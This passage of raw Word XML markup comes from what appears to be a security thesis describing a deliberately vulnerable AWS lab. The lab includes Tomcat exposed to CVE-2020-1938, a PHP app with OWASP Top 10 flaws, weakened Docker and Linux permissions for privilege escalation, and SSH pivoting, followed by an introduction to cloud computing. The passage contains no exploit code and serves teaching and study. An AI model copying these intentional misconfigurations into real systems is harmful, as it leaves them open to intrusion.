        <w:t>Virtual Private Cloud</w:t>
      </w:r>
      <w:r w:rsidR="004F5AE9" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, subnets, EC2</w:t>
      </w:r>
      <w:r w:rsidR="00085AC3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00085AC3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Elastic Compute Cloud</w:t>
      </w:r>
      <w:r w:rsidR="00085AC3" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> instances, and supporting AWS components. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A55CACB" w14:textId="77777777" w:rsidR="002040C2" w:rsidRPr="00D77DFE" w:rsidRDefault="002040C2" w:rsidP="00420160">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Each EC2 instance was manually configured, including Apache Tomcat, a custom PHP web application, Linux permissions, Docker settings, and intentional security misconfigurations to simulate real‑world attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190562D3" w14:textId="002C05BB" w:rsidR="002040C2" w:rsidRPr="00D77DFE" w:rsidRDefault="002040C2" w:rsidP="00420160">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All instances ran the Ubuntu operating system. The Tomcat application was configured to be vulnerable to CVE‑2020‑1938</w:t>
      </w:r>
      <w:r w:rsidR="00E06DF8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  (vulnerability in Apache Tomcat </w:t>
      </w:r>
      <w:r w:rsidR="005C204D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00E06DF8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">allows the attacker to </w:t>
      </w:r>
      <w:r w:rsidR="00E06DF8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>return arbitrary files from anywhere in the web application</w:t>
      </w:r>
      <w:r w:rsidR="00E06DF8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, while the custom web application intentionally included multiple </w:t>
      </w:r>
      <w:r w:rsidR="00E06DF8" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OWASP (Open Worldwide Application Security Project) Top 10 vulnerabilities, such as LFI (Local File Inclusion), Command Injection, IDOR (Insecure Direct Object Reference), Open Redirect, SSRF (Server Side Request Forgery), SSTI (Server Side Template Injection) , File Upload, and XSS (Cross Site Scripting).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF4899" w14:textId="79C03CF9" w:rsidR="00A44B3D" w:rsidRDefault="002040C2" w:rsidP="00A02D1D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux permissions and Docker configurations were deliberately weakened to demonstrate privilege escalation from a low‑privileged user to a root shell. Additionally, SSH</w:t>
      </w:r>
      <w:r w:rsidR="00690249" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00690249" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Secure Shell</w:t>
      </w:r>
      <w:r w:rsidR="00690249" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> key‑based pivoting was demonstrated to illustrate lateral movement within the internal network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742A1ED7" w14:textId="77777777" w:rsidR="00420160" w:rsidRDefault="00420160" w:rsidP="00450E2D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60106E3D" w14:textId="77777777" w:rsidR="00420160" w:rsidRDefault="00420160" w:rsidP="00450E2D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="548F8286" w14:textId="77777777" w:rsidR="00420160" w:rsidRDefault="00420160" w:rsidP="00450E2D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17BC4049" w14:textId="77777777" w:rsidR="00420160" w:rsidRDefault="00420160" w:rsidP="00450E2D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A025252" w14:textId="77777777" w:rsidR="00420160" w:rsidRDefault="00420160" w:rsidP="00450E2D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70807F15" w14:textId="77777777" w:rsidR="00420160" w:rsidRDefault="00420160" w:rsidP="00450E2D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35C55342" w14:textId="77777777" w:rsidR="00420160" w:rsidRPr="00D77DFE" w:rsidRDefault="00420160" w:rsidP="00450E2D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBCE538" w14:textId="497C721C" w:rsidR="00751943" w:rsidRPr="00D77DFE" w:rsidRDefault="00AB66CD" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc223521079"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. AWS: THEORETICAL BACKGROUND</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6935140E" w14:textId="19B8BE9F" w:rsidR="0025361B" w:rsidRPr="00D77DFE" w:rsidRDefault="0025361B" w:rsidP="00317F9F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc223521080"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.1 Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="369FBF1A" w14:textId="6E17E497" w:rsidR="003D3C57" w:rsidRPr="00D77DFE" w:rsidRDefault="004A1D00" w:rsidP="001465F2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To simulate different types of attacks, it is necessary to set up an environment for Linux. The vulnerable web application was deployed on AWS, as resources are billed on a pay-as-you-go basis. This chapter discusses the core components that can be deployed on AWS. It introduces the concepts of cloud computing and Infrastructure as a Service (IaaS), followed by an overview of key network components, including VPCs, subnets, Network Access Control Lists (NACLs), route tables, and Internet Gateways (IGWs). The chapter also covers AWS security mechanisms, such as security groups and built-in security capabilities, as well as the configuration and role of EC2 instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E372F9B" w14:textId="23E98D22" w:rsidR="007F045C" w:rsidRPr="00D77DFE" w:rsidRDefault="0025361B" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc223521081"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r w:rsidR="007F045C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">What is cloud </w:t>
      </w:r>
      <w:r w:rsidR="002040C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>computing?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="3D60C6DB" w14:textId="6C570C86" w:rsidR="008E5AA5" w:rsidRPr="00D77DFE" w:rsidRDefault="006A00AD" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud computing is a </w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">distributed computing </w:t>
      </w:r>
      <w:r w:rsidR="001C16DB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">which allows </w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">organizations </w:t>
      </w:r>
      <w:r w:rsidR="00062D36" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">having </w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r w:rsidR="00062D36" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> a range of digital processing </w:t>
      </w:r>
      <w:r w:rsidR="001C16DB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>abilities</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000C487A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>includ</w:t>
      </w:r>
      <w:r w:rsidR="000C487A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000C487A" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>virtual machines</w:t>
      </w:r>
      <w:r w:rsidR="00062D36" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> storage resources</w:t>
      </w:r>
      <w:r w:rsidR="001C16DB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> networking components</w:t>
      </w:r>
      <w:r w:rsidR="001C16DB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> databases and security tools via the internet instead of </w:t>
      </w:r>
      <w:r w:rsidR="001C16DB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">just </w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>relying on on-premises infrastructure</w:t>
      </w:r>
      <w:r w:rsidR="001C16DB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C16DB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>hese services are provided by third-party cloud platforms such as Alibaba cloud</w:t>
      </w:r>
      <w:r w:rsidR="001C16DB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>digital ocean or Huawei cloud</w:t>
      </w:r>
      <w:r w:rsidR="001C16DB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C16DB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">hese providers operate geographically dispersed infrastructure </w:t>
      </w:r>
      <w:r w:rsidR="001C16DB" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>confirming</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> high availability and redundancy</w:t>
      </w:r>
      <w:r w:rsidR="00E82F39" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E82F39" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="00E82F39" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sers </w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="007C3B0D" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>gain</w:t>
      </w:r>
      <w:r w:rsidR="00BB4947" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> computing power memory storage and operating environments configured to their operational needs while cloud platforms additionally </w:t>
      </w:r>
      <w:r w:rsidR="007C3B0D" w:rsidRPr="00D77DFE">
        <w:rPr>
